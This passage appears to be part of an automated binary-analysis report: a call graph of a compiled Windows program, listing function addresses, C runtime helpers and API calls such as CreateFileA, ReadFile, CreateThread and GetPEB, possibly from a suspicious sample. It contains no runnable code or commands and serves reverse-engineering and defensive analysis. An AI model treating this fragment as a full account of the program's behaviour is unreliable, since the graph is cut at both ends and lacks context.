9092->9094 9097 259bcf __dosmaperr 6 API calls 9093->9097 9095 25a31c __dosmaperr 14 API calls 9094->9095 9098 25a147 9095->9098 9096->9099 9097->9091 9100 25b0cb ___free_lconv_mon 14 API calls 9098->9100 9099->9086 9123 25835d 9099->9123 9100->9086 9102 25aced 9101->9102 9267 25ab4f 9102->9267 9107 25ad2d 9281 25a94a 9107->9281 9108 25ad1f 9109 25b0cb ___free_lconv_mon 14 API calls 9108->9109 9112 25ad06 9109->9112 9112->9028 9113 25ad65 9114 25b757 __strnicoll 14 API calls 9113->9114 9116 25ad6a 9114->9116 9115 25adac 9118 25adf5 9115->9118 9292 25b07e 9115->9292 9119 25b0cb ___free_lconv_mon 14 API calls 9116->9119 9117 25ad80 9117->9115 9120 25b0cb ___free_lconv_mon 14 API calls 9117->9120 9122 25b0cb ___free_lconv_mon 14 API calls 9118->9122 9119->9112 9120->9115 9122->9112 9132 25b1bc 9123->9132 9125 258362 9125->9123 9127 258377 IsProcessorFeaturePresent 9125->9127 9128 256eeb _unexpected 21 API calls 9125->9128 9131 258839 9125->9131 9135 25b1e3 9125->9135 9162 257dca 9125->9162 9168 25883a 9125->9168 9127->9125 9128->9125 9182 25b43f 9132->9182 9136 25b1ef ___scrt_is_nonwritable_in_current_image 9135->9136 9137 25b251 _unexpected 9136->9137 9138 25a15b __dosmaperr 14 API calls 9136->9138 9139 25b23f 9136->9139 9141 25b220 _unexpected 9136->9141 9143 25b287 _unexpected 9137->9143 9196 258161 EnterCriticalSection 9137->9196 9138->9141 9140 25b757 __strnicoll 14 API calls 9139->9140 9142 25b244 9140->9142 9141->9137 9141->9139 9161 25b229 9141->9161 9193 257d69 9142->9193 9147 25b2c4 9143->9147 9148 25b3c1 9143->9148 9158 25b2f2 9143->9158 9147->9158 9197 25a00a GetLastError 9147->9197 9150 25b3cc 9148->9150 9228 258178 LeaveCriticalSection 9148->9228 9151 256eeb _unexpected 21 API calls 9150->9151 9153 25b3d4 9151->9153 9155 25a00a _unexpected 48 API calls 9159 25b347 9155->9159 9157 25a00a _unexpected 48 API calls 9157->9158 9224 25b36d 9158->9224 9160 25a00a _unexpected 48 API calls 9159->9160 9159->9161 9160->9161 9161->9125 9163 257de6 std::_Xinvalid_argument _unexpected 9162->9163 9164 257e12 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9163->9164 9165 257ee3 _unexpected 9164->9165 9251 254241 9165->9251 9167 257f01 9167->9125 9169 258846 GetLastError 9168->9169 9170 258843 9168->9170 9259 25db9e 9169->9259 9170->9125 9173 2588c0 SetLastError 9173->9125 9174 25dbd9 ___vcrt_FlsSetValue 6 API calls 9175 258874 _unexpected 9174->9175 9177 25dbd9 ___vcrt_FlsSetValue 6 API calls 9175->9177 9179 25889c 9175->9179 9181 25887a 9175->9181 9176 25dbd9 ___vcrt_FlsSetValue 6 API calls 9178 2588b0 9176->9178 9177->9179 9264 2583ac 9178->9264 9179->9176 9179->9178 9181->9173 9183 25b44b ___scrt_is_nonwritable_in_current_image 9182->9183 9188 258161 EnterCriticalSection 9183->9188 9185 25b459 9189 25b49b 9185->9189 9188->9185 9192 258178 LeaveCriticalSection 9189->9192 9191 25b1e1 9191->9125 9192->9191 9229 25809f 9193->9229 9196->9143 9198 25a020 9197->9198 9199 25a026 9197->9199 9201 259b90 __dosmaperr 6 API calls 9198->9201 9200 259bcf __dosmaperr 6 API calls 9199->9200 9203 25a02a SetLastError 9199->9203 9202 25a042 9200->9202 9201->9199 9202->9203 9205 25b807 __dosmaperr 14 API calls 9202->9205 9207 25a0bf 9203->9207 9208 25a0ba 9203->9208 9206 25a057 9205->9206 9209 25a070 9206->9209 9210 25a05f 9206->9210 9211 25835d __FrameHandler3::FrameUnwindToState 46 API calls 9207->9211 9208->9157 9213 259bcf __dosmaperr 6 API calls 9209->9213 9212 259bcf __dosmaperr 6 API calls 9210->9212 9214 25a0c4 9211->9214 9215 25a06d 9212->9215 9216 25a07c 9213->9216 9220 25b0cb ___free_lconv_mon 14 API calls 9215->9220 9217 25a097 9216->9217 9218 25a080 9216->9218 9221 25a31c __dosmaperr 14 API calls 9217->9221 9219 259bcf __dosmaperr 6 API calls 9218->9219 9219->9215 9220->9203 9222 25a0a2 9221->9222 9223 25b0cb ___free_lconv_mon 14 API calls 9222->9223 9223->9203 9225 25b371 9224->9225 9226 25b339 9224->9226 9250 258178 LeaveCriticalSection 9225->9250 9226->9155 9226->9159 9226->9161 9228->9150 9230 2580b1 __strnicoll 9229->9230 9235 257f12 9230->9235 9236 257f22 9235->9236 9237 257f29 9235->9237 9238 258030 __strnicoll 16 API calls 9236->9238 9239 258076 __strnicoll GetLastError SetLastError 9237->9239 9242 257f37 9237->9242 9238->9237 9240 257f5e 9239->9240 9241 257d96 __strnicoll 11 API calls 9240->9241 9240->9242 9243 257f8e 9241->9243 9244 257fd7 9242->9244 9245 257fe3 9244->9245 9246 257ffa 9245->9246 9247 258013 __strnicoll 48 API calls 9245->9247 9248 257d75 9246->9248 9249 258013 __strnicoll 48 API calls 9246->9249 9247->9246 9248->9161 9249->9248 9250->9226 9252 254249 9251->9252 9253 25424a IsProcessorFeaturePresent 9251->9253 9252->9167 9255 2549f4 9253->9255 9258 254ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9255->9258 9257 254ad7 9257->9167 9258->9257 9260 25dca9 ___vcrt_FlsGetValue 5 API calls 9259->9260 9261 25dbb8 9260->9261 9262 25885b 9261->9262 9263 25dbd0 TlsGetValue 9261->9263 9262->9173 9262->9174 9262->9181 9263->9262 9265 25b0cb ___free_lconv_mon 14 API calls 9264->9265 9266 2583c4 9265->9266 9266->9181 9300 25a8c8 9267->9300 9270 25ab70 GetOEMCP 9273 25ab99 9270->9273 9271 25ab82 9272 25ab87 GetACP 9271->9272 9271->9273 9272->9273 9273->9112 9274 25bc45 9273->9274 9275 25bc83 9274->9275 9279 25bc53 __dosmaperr 9274->9279 9277 25b757 __strnicoll 14 API calls 9275->9277 9276 25bc6e RtlAllocateHeap 9278 25ad17 9276->9278 9276->9279 9277->9278 9278->9107 9278->9108 9279->9275 9279->9276 9280 257207 __dosmaperr 2 API calls 9279->9280 9280->9279 9282 25ab4f 50 API calls 9281->9282 9283 25a96a 9282->9283 9284 25aa6f 9283->9284 9286 25a9a7 IsValidCodePage 9283->9286 9291 25a9c2 std::_Xinvalid_argument 9283->9291 9285 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9284->9285 9287 25ab4d 9285->9287 9286->9284 9288 25a9b9 9286->9288 9287->9113 9287->9117 9289 25a9e2 GetCPInfo 9288->9289 9288->9291 9289->9284 9289->9291 9340 25aed9 9291->9340 9293 25b08a ___scrt_is_nonwritable_in_current_image 9292->9293 9417 258161 EnterCriticalSection 9293->9417 9295 25b094 9418 25ae18 9295->9418 9301 25a8e6 9300->9301 9307 25a8df 9300->9307 9302 25a00a _unexpected 48 API calls 9301->9302 9301->9307 9303 25a907 9302->9303 9308 25d95d 9303->9308 9307->9270 9307->9271 9309 25a91d 9308->9309 9310 25d970 9308->9310 9312 25d98a 9309->9312 9310->9309 9316 25c179 9310->9316 9313 25d9b2 9312->9313 9314 25d99d 9312->9314 9313->9307 9314->9313 9337 25a863 9314->9337 9317 25c185 ___scrt_is_nonwritable_in_current_image 9316->9317 9318 25a00a _unexpected 48 API calls 9317->9318 9319 25c18e 9318->9319 9320 25c1d4 9319->9320 9329 258161 EnterCriticalSection 9319->9329 9320->9309 9322 25c1ac 9330 25c1fa 9322->9330 9327 25835d __FrameHandler3::FrameUnwindToState 48 API calls 9328 25c1f9 9327->9328 9329->9322 9331 25c1bd 9330->9331 9332 25c208 __strnicoll 9330->9332 9334 25c1d9 9331->9334 9332->9331 9333 25bfae __strnicoll 14 API calls 9332->9333 9333->9331 9335 258178 _unexpected LeaveCriticalSection 9334->9335 9336 25c1d0 9335->9336 9336->9320 9336->9327 9338 25a00a _unexpected 48 API calls 9337->9338 9339 25a868 9338->9339 9339->9313 9341 25af01 GetCPInfo 9340->9341 9350 25afca 9340->9350 9342 25af19 9341->9342 9341->9350 9351 25bced 9342->9351 9343 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9345 25b07c 9343->9345 9345->9284 9349 25ded4 52 API calls 9349->9350 9350->9343 9352 25a8c8 __strnicoll 48 API calls 9351->9352 9353 25bd0d 9352->9353 9371 25bdee 9353->9371 9355 25bdc9 9358 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9355->9358 9356 25bdc1 9374 25bccd 9356->9374 9357 25bd3a 9357->9355 9357->9356 9360 25bc45 15 API calls 9357->9360 9362 25bd5f std::_Xinvalid_argument __alloca_probe_16 9357->9362 9361 25af81 9358->9361 9360->9362 9366 25ded4 9361->9366 9362->9356 9363 25bdee ___scrt_uninitialize_crt MultiByteToWideChar 9362->9363 9364 25bda8 9363->9364 9364->9356 9365 25bdaf GetStringTypeW 9364->9365 9365->9356 9367 25a8c8 __strnicoll 48 API calls 9366->9367 9368 25dee7 9367->9368 9380 25df1d 9368->9380 9378 25be18 9371->9378 9375 25bcd9 9374->9375 9376 25bcea 9374->9376 9375->9376 9377 25b0cb ___free_lconv_mon 14 API calls 9375->9377 9376->9355 9377->9376 9379 25be0a MultiByteToWideChar 9378->9379 9379->9357 9381 25df38 9380->9381 9382 25bdee ___scrt_uninitialize_crt MultiByteToWideChar 9381->9382 9385 25df7c 9382->9385 9383 25e0f7 9384 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9383->9384 9386 25afa2 9384->9386 9385->9383 9387 25bc45 15 API calls 9385->9387 9389 25dfa2 __alloca_probe_16 9385->9389 9400 25e04a 9385->9400 9386->9349 9387->9389 9388 25bccd __freea 14 API calls 9388->9383 9390 25bdee ___scrt_uninitialize_crt MultiByteToWideChar 9389->9390 9389->9400 9391 25dfeb 9390->9391 9391->9400 9408 259c5c 9391->9408 9394 25e021 9399 259c5c 6 API calls 9394->9399 9394->9400 9395 25e059 9396 25e0e2 9395->9396 9397 25bc45 15 API calls 9395->9397 9401 25e06b __alloca_probe_16 9395->9401 9398 25bccd __freea 14 API calls 9396->9398 9397->9401 9398->9400 9399->9400 9400->9388 9401->9396 9402 259c5c 6 API calls 9401->9402 9403 25e0ae 9402->9403 9403->9396 9414 25d131 9403->9414 9405 25e0c8 9405->9396 9406 25e0d1 9405->9406 9407 25bccd __freea 14 API calls 9406->9407 9407->9400 9409 259f57 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9408->9409 9410 259c67 9409->9410 9411 259cb9 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9410->9411 9413 259c6d 9410->9413 9412 259cad LCMapStringW 9411->9412 9412->9413 9413->9394 9413->9395 9413->9400 9415 25d144 ___scrt_uninitialize_crt 9414->9415 9416 25d182 WideCharToMultiByte 9415->9416 9416->9405 9417->9295 9428 25a7e2 9418->9428 9420 25ae3a 9421 25a7e2 48 API calls 9420->9421 9422 25ae59 9421->9422 9423 25ae80 9422->9423 9424 25b0cb ___free_lconv_mon 14 API calls 9422->9424 9425 25b0bf 9423->9425 9424->9423 9442 258178 LeaveCriticalSection 9425->9442 9427 25b0ad 9427->9118 9429 25a7f3 9428->9429 9437 25a7ef CatchIt 9428->9437 9430 25a7fa 9429->9430 9434 25a80d std::_Xinvalid_argument 9429->9434 9431 25b757 __strnicoll 14 API calls 9430->9431 9432 25a7ff 9431->9432 9433 257d69 __strnicoll 48 API calls 9432->9433 9433->9437 9435 25a844 9434->9435 9436 25a83b 9434->9436 9434->9437 9435->9437 9439 25b757 __strnicoll 14 API calls 9435->9439 9438 25b757 __strnicoll 14 API calls 9436->9438 9437->9420 9440 25a840 9438->9440 9439->9440 9441 257d69 __strnicoll 48 API calls 9440->9441 9441->9437 9442->9427 9444 2596c8 9443->9444 9445 2596ba 9443->9445 9446 25b757 __strnicoll 14 API calls 9444->9446 9445->9444 9450 2596e0 9445->9450 9447 2596d0 9446->9447 9449 257d69 __strnicoll 48 API calls 9447->9449 9448 2596da 9448->9067 9449->9448 9450->9448 9451 25b757 __strnicoll 14 API calls 9450->9451 9451->9447 9453 257b5d 9452->9453 9454 257b7a 9452->9454 9455 257b74 9453->9455 9457 25b0cb ___free_lconv_mon 14 API calls 9453->9457 9454->9068 9456 25b0cb ___free_lconv_mon 14 API calls 9455->9456 9456->9454 9457->9453 9459 257da2 9458->9459 9460 257dca _unexpected 8 API calls 9459->9460 9461 257db7 GetCurrentProcess TerminateProcess 9460->9461 9461->9074 9463 25d30f 9462->9463 9464 25d320 9463->9464 9467 25d333 ___from_strstr_to_strchr 9463->9467 9465 25b757 __strnicoll 14 API calls 9464->9465 9466 25d325 9465->9466 9466->9025 9468 25d54a 9467->9468 9469 25d353 9467->9469 9470 25b757 __strnicoll 14 API calls 9468->9470 9525 25d56f 9469->9525 9471 25d54f 9470->9471 9473 25b0cb ___free_lconv_mon 14 API calls 9471->9473 9473->9466 9475 25d399 9479 25b807 __dosmaperr 14 API calls 9475->9479 9491 25d383 9475->9491 9477 25d375 9482 25d392 9477->9482 9483 25d37e 9477->9483 9481 25d3a7 9479->9481 9480 25b0cb ___free_lconv_mon 14 API calls 9480->9466 9485 25b0cb ___free_lconv_mon 14 API calls 9481->9485 9487 25d56f 48 API calls 9482->9487 9486 25b757 __strnicoll 14 API calls 9483->9486 9484 25d40c 9489 25b0cb ___free_lconv_mon 14 API calls 9484->9489 9490 25d3b2 9485->9490 9486->9491 9492 25d397 9487->9492 9488 25d457 9488->9491 9493 25d0c4 51 API calls 9488->9493 9499 25d414 9489->9499 9490->9491 9490->9492 9494 25b807 __dosmaperr 14 API calls 9490->9494 9491->9480 9492->9491 9529 25d589 9492->9529 9495 25d485 9493->9495 9496 25d3ce 9494->9496 9498 25b0cb ___free_lconv_mon 14 API calls 9495->9498 9501 25b0cb ___free_lconv_mon 14 API calls 9496->9501 9497 25d53f 9502 25b0cb ___free_lconv_mon 14 API calls 9497->9502 9503 25d441 9498->9503 9499->9503 9533 25d0c4 9499->9533 9501->9492 9502->9466 9503->9491 9503->9497 9506 25b807 __dosmaperr 14 API calls 9503->9506 9504 25d438 9505 25b0cb ___free_lconv_mon 14 API calls 9504->9505 9505->9503 9507 25d4d0 9506->9507 9508 25d4e0 9507->9508 9509 25d4d8 9507->9509 9511 2596ac ___std_exception_copy 48 API calls 9508->9511 9510 25b0cb ___free_lconv_mon 14 API calls 9509->9510 9510->9491 9512 25d4ec 9511->9512 9513 25d564 9512->9513 9514 25d4f3 9512->9514 9515 257d96 __strnicoll 11 API calls 9513->9515 9542 25f9bc 9514->9542 9517 25d56e 9515->9517 9519 25d539 9522 25b0cb ___free_lconv_mon 14 API calls 9519->9522 9520 25d51a 9521 25b757 __strnicoll 14 API calls 9520->9521 9523 25d51f 9521->9523 9522->9497 9524 25b0cb ___free_lconv_mon 14 API calls 9523->9524 9524->9491 9526 25d57c 9525->9526 9527 25d35e 9525->9527 9557 25d5de 9526->9557 9527->9475 9527->9477 9527->9492 9530 25d59f 9529->9530 9532 25d3fc 9529->9532 9530->9532 9572 25f8cb 9530->9572 9532->9484 9532->9488 9534 25d0d1 9533->9534 9535 25d0ec 9533->9535 9534->9535 9536 25d0dd 9534->9536 9537 25d0fb 9535->9537 9606 25f6f8 9535->9606 9539 25b757 __strnicoll 14 API calls 9536->9539 9613 25f72b 9537->9613 9541 25d0e2 std::_Xinvalid_argument 9539->9541 9541->9504 9625 25c274 9542->9625 9547 25fa2f 9549 25fa3b 9547->9549 9551 25b0cb ___free_lconv_mon 14 API calls 9547->9551 9548 25c274 48 API calls 9550 25fa0c 9548->9550 9553 25b0cb ___free_lconv_mon 14 API calls 9549->9553 9555 25d514 9549->9555 9552 25c30c 17 API calls 9550->9552 9551->9549 9554 25fa19 9552->9554 9553->9555 9554->9547 9556 25fa23 SetEnvironmentVariableW 9554->9556 9555->9519 9555->9520 9556->9547 9558 25d5f1 9557->9558 9559 25d5ec 9557->9559 9560 25b807 __dosmaperr 14 API calls 9558->9560 9559->9527 9566 25d60e 9560->9566 9561 25d67c 9562 25835d __FrameHandler3::FrameUnwindToState 48 API calls 9561->9562 9564 25d681 9562->9564 9563 25b0cb ___free_lconv_mon 14 API calls 9563->9559 9565 257d96 __strnicoll 11 API calls 9564->9565 9567 25d68d 9565->9567 9566->9561 9566->9564 9568 25b807 __dosmaperr 14 API calls 9566->9568 9569 25b0cb ___free_lconv_mon 14 API calls 9566->9569 9570 2596ac ___std_exception_copy 48 API calls 9566->9570 9571 25d66b 9566->9571 9568->9566 9569->9566 9570->9566 9571->9563 9573 25f8df 9572->9573 9574 25f8d9 9572->9574 9573->9530 9575 2601e1 9574->9575 9576 260199 9574->9576 9588 2601f7 9575->9588 9578 26019f 9576->9578 9581 2601bc 9576->9581 9580 25b757 __strnicoll 14 API calls 9578->9580 9579 2601af 9579->9530 9582 2601a4 9580->9582 9584 25b757 __strnicoll 14 API calls 9581->9584 9587 2601da 9581->9587 9583 257d69 __strnicoll 48 API calls 9582->9583 9583->9579 9585 2601cb 9584->9585 9586 257d69 __strnicoll 48 API calls 9585->9586 9586->9579 9587->9530 9589 260207 9588->9589 9590 260221 9588->9590 9591 25b757 __strnicoll 14 API calls 9589->9591 9592 260240 9590->9592 9593 260229 9590->9593 9594 26020c 9591->9594 9596 260263 9592->9596 9597 26024c 9592->9597 9595 25b757 __strnicoll 14 API calls 9593->9595 9598 257d69 __strnicoll 48 API calls 9594->9598 9599 26022e 9595->9599 9601 25a8c8 __strnicoll 48 API calls 9596->9601 9604 260217 9596->9604 9600 25b757 __strnicoll 14 API calls 9597->9600 9598->9604 9602 257d69 __strnicoll 48 API calls 9599->9602 9603 260251 9600->9603 9601->9604 9602->9604 9605 257d69 __strnicoll 48 API calls 9603->9605 9604->9579 9605->9604 9607 25f703 9606->9607 9608 25f718 HeapSize 9606->9608 9609 25b757 __strnicoll 14 API calls 9607->9609 9608->9537 9610 25f708 9609->9610 9611 257d69 __strnicoll 48 API calls 9610->9611 9612 25f713 9611->9612 9612->9537 9614 25f743 9613->9614 9615 25f738 9613->9615 9616 25f74b 9614->9616 9623 25f754 __dosmaperr 9614->9623 9617 25bc45 15 API calls 9615->9617 9618 25b0cb ___free_lconv_mon 14 API calls 9616->9618 9621 25f740 9617->9621 9618->9621 9619 25f77e HeapReAlloc 9619->9621 9619->9623 9620 25f759 9622 25b757 __strnicoll 14 API calls 9620->9622 9621->9541 9622->9621 9623->9619 9623->9620 9624 257207 __dosmaperr 2 API calls 9623->9624 9624->9623 9626 25a8c8 __strnicoll 48 API calls 9625->9626 9627 25c286 9626->9627 9628 25c298 9627->9628 9633 259a96 9627->9633 9630 25c30c 9628->9630 9639 25c4e2 9630->9639 9636 259f23 9633->9636 9637 259e9e __dosmaperr 5 API calls 9636->9637 9638 259a9e 9637->9638 9638->9628 9640 25c4f0 9639->9640 9641 25c50a 9639->9641 9657 25c2f2 9640->9657 9643 25c511 9641->9643 9644 25c530 9641->9644 9645 25c324 9643->9645 9661 25c2b3 9643->9661 9646 25bdee ___scrt_uninitialize_crt MultiByteToWideChar 9644->9646 9645->9547 9645->9548 9648 25c53f 9646->9648 9649 25c546 GetLastError 9648->9649 9651 25c2b3 15 API calls 9648->9651 9655 25c56c 9648->9655 9666 25b77d 9649->9666 9651->9655 9652 25bdee ___scrt_uninitialize_crt MultiByteToWideChar 9656 25c583 9652->9656 9654 25b757 __strnicoll 14 API calls 9654->9645 9655->9645 9655->9652 9656->9645 9656->9649 9658 25c2fd 9657->9658 9659 25c305 9657->9659 9660 25b0cb ___free_lconv_mon 14 API calls 9658->9660 9659->9645 9660->9659 9662 25c2f2 14 API calls 9661->9662 9663 25c2c1 9662->9663 9671 25c255 9663->9671 9674 25b76a 9666->9674 9668 25b788 __dosmaperr 9669 25b757 __strnicoll 14 API calls 9668->9669 9670 25b79b 9669->9670 9670->9654 9672 25bc45 15 API calls 9671->9672 9673 25c262 9672->9673 9673->9645 9675 25a15b __dosmaperr 14 API calls 9674->9675 9676 25b76f 9675->9676 9676->9668 9678 24ce50 std::_Throw_Cpp_error 9677->9678 9696 253b60 9678->9696 9681 24ce70 9688 24ce93 9681->9688 9682 25441d 52 API calls std::_Throw_Cpp_error 9682->9688 9683 24d449 9684 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9683->9684 9685 24cdd5 CreateEllipticRgn 9684->9685 9690 24d4a0 9685->9690 9686 24cf87 GetCurrentThreadId 9686->9688 9687 25441d std::_Throw_Cpp_error 52 API calls 9687->9686 9688->9682 9688->9683 9688->9686 9688->9687 10053 254952 WaitForSingleObjectEx 9688->10053 9691 24d4c0 9690->9691 9693 24d528 9691->9693 10058 25846b 9691->10058 9694 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9693->9694 9695 24ce14 9694->9695 9695->8889 9697 253b8b std::_Throw_Cpp_error 9696->9697 9710 253cc0 9697->9710 9699 253b9a 9719 256ce6 9699->9719 9701 253c84 9738 25441d 9701->9738 9703 253c9a 9744 253e30 9703->9744 9704 253bea 9704->9701 9704->9703 9734 253de0 9704->9734 9707 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9709 24cdc7 9707->9709 9709->9681 9750 2541c6 9710->9750 9712 253cef std::_Throw_Cpp_error 9764 253f00 9712->9764 9717 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9718 253d32 9717->9718 9718->9699 9720 256d07 9719->9720 9721 256cf3 9719->9721 9788 256d77 9720->9788 9722 25b757 __strnicoll 14 API calls 9721->9722 9724 256cf8 9722->9724 9726 257d69 __strnicoll 48 API calls 9724->9726 9730 256d03 9726->9730 9727 256d1c CreateThread 9728 256d3b GetLastError 9727->9728 9729 256d47 9727->9729 9805 256e00 9727->9805 9731 25b77d __dosmaperr 14 API calls 9728->9731 9797 256dc7 9729->9797 9730->9704 9731->9729 9735 253e0c 9734->9735 9736 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9735->9736 9737 253e19 9736->9737 9737->9704 9739 254433 std::_Throw_Cpp_error 9738->9739 9945 25467d 9739->9945 9745 253e58 std::_Throw_Cpp_error 9744->9745 9746 253ee3 9745->9746 10049 2540f0 9745->10049 9747 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9746->9747 9748 253ca2 9747->9748 9748->9707 9753 2541cb 9750->9753 9752 2541e5 9752->9712 9753->9752 9754 257207 __dosmaperr 2 API calls 9753->9754 9755 2541e7 std::_Throw_Cpp_error 9753->9755 9773 2583c7 9753->9773 9754->9753 9756 2549c1 std::_Throw_Cpp_error 9755->9756 9780 2559fc 9755->9780 9757 2559fc std::_Xinvalid_argument RaiseException 9756->9757 9759 2549de IsProcessorFeaturePresent 9757->9759 9761 2549f4 9759->9761 9783 254ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9761->9783 9763 254ad7 9763->9712 9784 253fb0 9764->9784 9767 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9768 253d0e 9767->9768 9769 253f60 9768->9769 9770 253f95 9769->9770 9771 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9770->9771 9772 253d22 9771->9772 9772->9717 9778 25bc45 __dosmaperr 9773->9778 9774 25bc83 9776 25b757 __strnicoll 14 API calls 9774->9776 9775 25bc6e RtlAllocateHeap 9777 25bc81 9775->9777 9775->9778 9776->9777 9777->9753 9778->9774 9778->9775 9779 257207 __dosmaperr 2 API calls 9778->9779 9779->9778 9781 255a16 9780->9781 9782 255a43 RaiseException 9780->9782 9781->9782 9782->9756 9783->9763 9785 253fe2 std::_Throw_Cpp_error 9784->9785 9786 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9785->9786 9787 253f36 9786->9787 9787->9767 9789 25b807 __dosmaperr 14 API calls 9788->9789 9790 256d88 9789->9790 9791 25b0cb ___free_lconv_mon 14 API calls 9790->9791 9792 256d95 9791->9792 9793 256d9c GetModuleHandleExW 9792->9793 9794 256db9 9792->9794 9793->9794 9795 256dc7 16 API calls 9794->9795 9796 256d13 9795->9796 9796->9727 9796->9729 9798 256dd3 9797->9798 9804 256d52 9797->9804 9799 256de2 9798->9799 9800 256dd9 CloseHandle 9798->9800 9801 256df1 9799->9801 9802 256de8 FreeLibrary 9799->9802 9800->9799 9803 25b0cb ___free_lconv_mon 14 API calls 9801->9803 9802->9801 9803->9804 9804->9704 9806 256e0c ___scrt_is_nonwritable_in_current_image 9805->9806 9807 256e20 9806->9807 9808 256e13 GetLastError ExitThread 9806->9808 9809 25a00a _unexpected 48 API calls 9807->9809 9810 256e25 9809->9810 9821 25b976 9810->9821 9814 256e3c 9825 253d40 9814->9825 9822 256e30 9821->9822 9823 25b986 _unexpected 9821->9823 9822->9814 9836 259cea 9822->9836 9823->9822 9842 259d93 9823->9842 9826 253f60 5 API calls 9825->9826 9827 253d6d std::_Throw_Cpp_error 9826->9827 9845 2540a0 9827->9845 9832 253e30 5 API calls 9833 253da6 9832->9833 9834 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9833->9834 9835 253db5 9834->9835 9839 256d69 9835->9839 9837 259e9e __dosmaperr 5 API calls 9836->9837 9838 259d06 9837->9838 9838->9814 9933 256e7e 9839->9933 9843 259e9e __dosmaperr 5 API calls 9842->9843 9844 259daf 9843->9844 9844->9822 9853 24cd10 GetPEB 9845->9853 9848 2548cb GetCurrentThreadId 9925 254c86 9848->9925 9852 2548e4 __Mtx_unlock __Cnd_broadcast 9928 254c92 9852->9928 9860 2584a7 9853->9860 9858 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9859 24cd82 9858->9859 9859->9848 9861 2584ba __strnicoll 9860->9861 9875 258537 9861->9875 9864 257fd7 __strnicoll 48 API calls 9865 24cd62 9864->9865 9866 24c860 9865->9866 9873 24c890 9866->9873 9868 24cced 9869 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9868->9869 9871 24ccf9 9869->9871 9871->9858 9873->9868 9899 24beb0 CreateFileA 9873->9899 9909 2486c0 9873->9909 9916 241000 9873->9916 9922 248ea0 9873->9922 9876 258567 9875->9876 9877 258594 9876->9877 9878 258576 9876->9878 9896 25856b 9876->9896 9880 2585a1 9877->9880 9882 2584de ___scrt_uninitialize_crt 48 API calls 9877->9882 9879 257f12 __strnicoll 29 API calls 9878->9879 9879->9896 9883 2585d9 9880->9883 9884 2585bb 9880->9884 9881 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9888 2584cc 9881->9888 9882->9880 9886 2585ed 9883->9886 9887 258769 9883->9887 9885 25da19 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9884->9885 9885->9896 9890 258687 9886->9890 9894 258631 9886->9894 9886->9896 9889 25d131 ___scrt_uninitialize_crt WideCharToMultiByte 9887->9889 9887->9896 9888->9864 9889->9896 9891 25d131 ___scrt_uninitialize_crt WideCharToMultiByte 9890->9891 9893 25869a 9891->9893 9892 25d131 ___scrt_uninitialize_crt WideCharToMultiByte 9892->9896 9895 2586b3 GetLastError 9893->9895 9893->9896 9894->9892 9895->9896 9898 2586c2 9895->9898 9896->9881 9897 25d131 ___scrt_uninitialize_crt WideCharToMultiByte 9897->9898 9898->9896 9898->9897 9902 24bf29 9899->9902 9900 24c021 GetFileSize 9900->9902 9901 24c083 ReadFile 9901->9902 9902->9900 9902->9901 9903 24c12c CloseHandle 9902->9903 9904 24c059 CloseHandle 9902->9904 9905 24c14b 9902->9905 9907 24c10d CloseHandle 9902->9907 9903->9902 9904->9902 9906 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9905->9906 9908 24c160 9906->9908 9907->9902 9908->9873 9915 248783 std::_Throw_Cpp_error 9909->9915 9910 248dd8 9911 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9910->9911 9913 248de8 9911->9913 9912 24ea10 51 API calls std::_Throw_Cpp_error 9912->9915 9913->9873 